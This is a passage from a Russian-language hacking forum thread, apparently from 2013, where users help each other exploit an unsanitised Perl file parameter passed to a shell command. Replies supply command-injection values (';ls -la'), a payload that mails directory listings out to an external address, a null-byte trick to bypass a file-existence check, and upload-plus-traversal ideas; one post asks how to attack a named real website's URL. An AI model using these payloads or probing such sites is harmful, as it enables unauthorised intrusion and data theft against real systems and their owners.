Старый 22.03.2013, 07:51   #2811
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

у меня никак не получилось обойти, единственное попробуй разными методами отправить (пост гет куки) и поиграться с фильтром - действительно ли он жесткий
opium вне форума   Ответить с цитированием
Старый 25.03.2013, 02:35   #2812
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Код:
my $dir='/var/www/files/';

error() unless -f "$dir$file";

my $type=`file -ib $dir$file`;

<...>

sub error 
{
	print 'Error.';
	exit;
}
$file никак не фильтруется, передается GET'ом. Какие-то варианты здесь есть?
Untitled вне форума   Ответить с цитированием
Старый 25.03.2013, 05:20   #2813
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Untitled по идее: ;ls -la
Воришко вне форума   Ответить с цитированием
Старый 25.03.2013, 09:38   #2814
banana
 
Аватар для banana
 
Регистрация: 05.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Смотря что дальше происходит с $type.
banana вне форума   Ответить с цитированием
Старый 25.03.2013, 14:36   #2815
wfx
 
Регистрация: 27.02.2011
Сообщений: 2
Репутация: 0
По умолчанию

http://www.winvalue.de/wvcrawler/core.php?uc=query&obj=veh

что можно сделать?
wfx вне форума   Ответить с цитированием
Старый 25.03.2013, 15:48   #2816
dr.Pilulkin
 
Регистрация: 04.01.2011
Сообщений: 22
Репутация: 9
По умолчанию

2Untitled:
Если нет вывода
$file = ";ls -la|mail mail@mail.ru;"

Последний раз редактировалось dr.Pilulkin; 25.03.2013 в 15:53..
dr.Pilulkin вне форума   Ответить с цитированием
Старый 25.03.2013, 16:46   #2817
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

А "error() unless -f "$dir$file";" никто не заметил?
SynQ вне форума   Ответить с цитированием
Старый 25.03.2013, 17:49   #2818
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
А "error() unless -f "$dir$file";" никто не заметил?
Ыгы, но, очевидно, можно либо прямо туда файл залить, либо в /tmp (сессию, например), потом traversal.
Beched вне форума   Ответить с цитированием
Старый 25.03.2013, 19:00   #2819
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

так возможно прокатит:
file=СуществующийФайл%00;ls -al

$xxx="c:\\boot.ini\0\12333";
(print $xxx) unless -f $xxx;

такой вариант на перле срабатывает "для обхода" unless -f

Последний раз редактировалось DrakonHaSh; 25.03.2013 в 19:08..
DrakonHaSh вне форума   Ответить с цитированием
Старый 25.03.2013, 20:15   #2820
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

DrakonHaSh
C нуллбайтом сразу попробовал, режет как в unless, так и при исполнении команды.
Beched
Существующий файл в $dir и так известен, но это и не обязательно.

Последний раз редактировалось Untitled; 25.03.2013 в 20:19..
Untitled вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot